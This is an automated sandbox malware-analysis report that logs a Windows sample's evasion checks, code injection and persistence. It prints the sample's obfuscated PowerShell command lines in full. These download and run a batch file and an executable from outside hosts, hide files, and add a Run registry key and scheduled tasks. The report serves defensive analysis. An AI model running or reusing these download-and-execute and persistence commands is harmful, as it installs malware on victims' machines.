Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, type: MEMORY

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\mode.com	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ps.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 2436	Thread sleep time: -51103s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1976	Thread sleep time: -49965s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2232	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2712	Thread sleep time: -54723s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\svchost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware ToolsH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: vmwareH
Source: powershell.exe, 0000000E.00000002.2115086772.00000000003B6000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q&%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\H
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMWAREH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: qA"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q87HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools\.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

27_2_004F1750

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_00401179 SetUnhandledExceptionFilter,

27_2_00401179

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\svchost.exe

Network Connect: 172.67.167.122 80

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory written: C:\Users\user\AppData\Local\Temp\ps.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Users\user\AppData\Roaming\svchost.exe base: 400000 value starts with: 4D5A

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\Documents\pd.bat, type: DROPPED

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
